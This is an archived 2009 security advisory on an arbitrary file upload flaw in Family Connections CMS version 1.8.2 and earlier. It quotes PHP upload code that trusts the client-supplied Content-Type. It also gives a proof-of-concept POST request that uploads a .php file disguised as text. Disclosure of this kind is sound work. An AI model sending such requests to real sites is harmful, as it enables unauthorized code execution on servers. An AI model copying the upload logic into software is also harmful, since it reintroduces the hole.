TUCoPS :: HP Unsorted F :: va3058.htm

Family Connections 1.8.2 Arbitrary File Upload
Family Connections 1.8.2 Arbitrary File Upload
Family Connections 1.8.2 Arbitrary File Upload


--001636c5a7e8288d060466a8c0cc
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com 

[+] Bugs: [A] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 3 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Arbitrary File Upload

[-] Files affected: documents.php inc/documents_class.php

This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.

...

if (isset($_POST['submitadd'])) {
				$doc = $_FILES['doc']['name'];
				$desc = addslashes($_POST['desc']);
				if ($docs->uploadDocument($_FILES['doc']['type'],
$_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {
					
...

function uploadDocument ($filetype, $filename, $filetmpname) {
		global $LANG;
		$known_photo_types = array('application/msword' => 'doc',
'text/plain' => 'txt', 'application/excel' => 'xsl',
'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl',
			'application/x-compressed' => 'zip', 'application/x-zip-compressed'
=> 'zip', 'application/zip' => 'zip', 'multipart/x-zip' => 'zip',
'application/rtf' => 'rtf',
			'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf',
'application/mspowerpoint' => 'ppt', 'application/powerpoint' =>
'ppt', 'application/vnd.ms-powerpoint' => 'ppt',
			'application/x-mspowerpoint' => 'ppt', 'application/x-excel' =>
'xsl', 'application/pdf' => 'pdf');
		if (!array_key_exists($filetype, $known_photo_types)) {
			echo "
".$LANG['err_not_doc1']." $filetype
".$LANG['err_not_doc2']."
".$LANG['err_not_doc3']."
";
			return false;
		} else {
			copy($filetmpname, "gallery/documents/$filename");
			return true;
		}
	}
	
...


*************************************************

[+] Code


- [A] Arbitrary File Upload

The following is an example of a malicious package:

POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
--AaB03x--\r\n


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

--001636c5a7e8288d060466a8c0cc
Content-Type: text/plain; charset=US-ASCII; 
	name="Family Connections <= 1.8.2 Arbitrary File Upload-03042009.txt"
Content-Disposition: attachment; 
	filename="Family Connections <= 1.8.2 Arbitrary File Upload-03042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ft32kazz0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBGYW1pbHkgQ29ubmVjdGlvbgpbK10gVmVyc2lvbjogPD0gMS44LjIKWytdIFdl
YnNpdGU6IGh0dHA6Ly93d3cuZmFtaWx5Y21zLmNvbQoKWytdIEJ1Z3M6IFtBXSBBcmJpdHJhcnkg
RmlsZSBVcGxvYWQKClsrXSBFeHBsb2l0YXRpb246IFJlbW90ZQpbK10gRGF0ZTogMyBBcHIgMjAw
OQoKWytdIERpc2NvdmVyZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBB
dXRob3I6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6
IGRyb3NvcGhpbGF4eHhAZ21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVn
cwoKCi0gW0FdIEFyYml0cmFyeSBGaWxlIFVwbG9hZAoKWy1dIEZpbGVzIGFmZmVjdGVkOiBkb2N1
bWVudHMucGhwIGluYy9kb2N1bWVudHNfY2xhc3MucGhwCgpUaGlzIGJ1ZyBhbGxvd3MgYSByZWdp
c3RlcmVkIHVzZXIgdG8gdXBsb2FkIGFyYml0cmFyeSAKZmlsZXMgb24gdGhlIHN5c3RlbS4gVGhp
cyBpcyBwb3NzaWJsZSBiZWNhdXNlIHRoZXJlIAphcmVuJ3QgY29udHJvbHMgb24gZmlsZSBleHRl
bnNpb24gYnV0IG9uIHRoZSAKQ29udGVudC1UeXBlIGhlYWRlciBvbmx5LCB0aGF0IGNhbiBiZSBj
aGFuZ2VkIGVhc2lseS4KCi4uLgoKaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0YWRkJ10pKSB7DQkJ
CQkkZG9jID0gJF9GSUxFU1snZG9jJ11bJ25hbWUnXTsNCQkJCSRkZXNjID0gYWRkc2xhc2hlcygk
X1BPU1RbJ2Rlc2MnXSk7DQkJCQlpZiAoJGRvY3MtPnVwbG9hZERvY3VtZW50KCRfRklMRVNbJ2Rv
YyddWyd0eXBlJ10sICRfRklMRVNbJ2RvYyddWyduYW1lJ10sICRfRklMRVNbJ2RvYyddWyd0bXBf
bmFtZSddKSkgewoJCQkJCQouLi4KCmZ1bmN0aW9uIHVwbG9hZERvY3VtZW50ICgkZmlsZXR5cGUs
ICRmaWxlbmFtZSwgJGZpbGV0bXBuYW1lKSB7DQkJZ2xvYmFsICRMQU5HOw0JCSRrbm93bl9waG90
b190eXBlcyA9IGFycmF5KCdhcHBsaWNhdGlvbi9tc3dvcmQnID0+ICdkb2MnLCAndGV4dC9wbGFp
bicgPT4gJ3R4dCcsICdhcHBsaWNhdGlvbi9leGNlbCcgPT4gJ3hzbCcsICdhcHBsaWNhdGlvbi92
bmQubXMtZXhjZWwnID0+ICd4c2wnLCAnYXBwbGljYXRpb24veC1tc2V4Y2VsJyA9PiAneHNsJywg
DQkJCSdhcHBsaWNhdGlvbi94LWNvbXByZXNzZWQnID0+ICd6aXAnLCAnYXBwbGljYXRpb24veC16
aXAtY29tcHJlc3NlZCcgPT4gJ3ppcCcsICdhcHBsaWNhdGlvbi96aXAnID0+ICd6aXAnLCAnbXVs
dGlwYXJ0L3gtemlwJyA9PiAnemlwJywgJ2FwcGxpY2F0aW9uL3J0ZicgPT4gJ3J0ZicsIA0JCQkn
YXBwbGljYXRpb24veC1ydGYnID0+ICdydGYnLCAndGV4dC9yaWNodGV4dCcgPT4gJ3J0ZicsICdh
cHBsaWNhdGlvbi9tc3Bvd2VycG9pbnQnID0+ICdwcHQnLCAnYXBwbGljYXRpb24vcG93ZXJwb2lu
dCcgPT4gJ3BwdCcsICdhcHBsaWNhdGlvbi92bmQubXMtcG93ZXJwb2ludCcgPT4gJ3BwdCcsIA0J
CQknYXBwbGljYXRpb24veC1tc3Bvd2VycG9pbnQnID0+ICdwcHQnLCAnYXBwbGljYXRpb24veC1l
eGNlbCcgPT4gJ3hzbCcsICdhcHBsaWNhdGlvbi9wZGYnID0+ICdwZGYnKTsNCQlpZiAoIWFycmF5
X2tleV9leGlzdHMoJGZpbGV0eXBlLCAka25vd25fcGhvdG9fdHlwZXMpKSB7DQkJCWVjaG8gIjxw
IGNsYXNzPVwiZXJyb3ItYWxlcnRcIj4iLiRMQU5HWydlcnJfbm90X2RvYzEnXS4iICRmaWxldHlw
ZSAiLiRMQU5HWydlcnJfbm90X2RvYzInXS4iPGJyLz4iLiRMQU5HWydlcnJfbm90X2RvYzMnXS4i
PC9wPiI7DQkJCXJldHVybiBmYWxzZTsNCQl9IGVsc2Ugew0JCQljb3B5KCRmaWxldG1wbmFtZSwg
ImdhbGxlcnkvZG9jdW1lbnRzLyRmaWxlbmFtZSIpOw0JCQlyZXR1cm4gdHJ1ZTsNCQl9DQl9CgkK
Li4uDQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioK
ClsrXSBDb2RlCgoKLSBbQV0gQXJiaXRyYXJ5IEZpbGUgVXBsb2FkCgpUaGUgZm9sbG93aW5nIGlz
IGFuIGV4YW1wbGUgb2YgYSBtYWxpY2lvdXMgcGFja2FnZToKClBPU1QgL2ZjbXMvdXBsb2FkLnBo
cCBIVFRQLzEuMVxyXG4KSG9zdDogbG9jYWxob3N0XHJcbgpDb29raWU6IFBIUFNFU1NJRD01MGZi
MTEzNWMyZGE3ZjYwYmI2NmViMzVjYmM2YWI5N1xyXG4KQ29udGVudC10eXBlOiBtdWx0aXBhcnQv
Zm9ybS1kYXRhLCBib3VuZGFyeT1BYUIwM3hcclxuCkNvbnRlbnQtTGVuZ3RoOiAyOTVcclxuXHJc
bgotLUFhQjAzeFxyXG4KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJkb2Mi
OyBmaWxlbmFtZT0iZmlsZS5waHAiXHJcbgpDb250ZW50LVR5cGU6IHRleHQvcGxhaW5cclxuClxy
XG4KPD9waHAgZWNobyAiVGhpcyBpcyBub3QgYSB0ZXh0IGZpbGUiPz5cclxuCi0tQWFCMDN4XHJc
bgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImRlc2MiXHJcbgpcclxuCmRl
c2NyaXB0aW9uXHJcbgotLUFhQjAzeFxyXG4KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRh
OyBuYW1lPSJzdWJtaXRhZGQiXHJcbgpcclxuClN1Ym1pdFxyXG4KLS1BYUIwM3gtLVxyXG4KCgoq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gRml4
CgpObyBmaXguCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKg=--001636c5a7e8288d060466a8c0cc--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH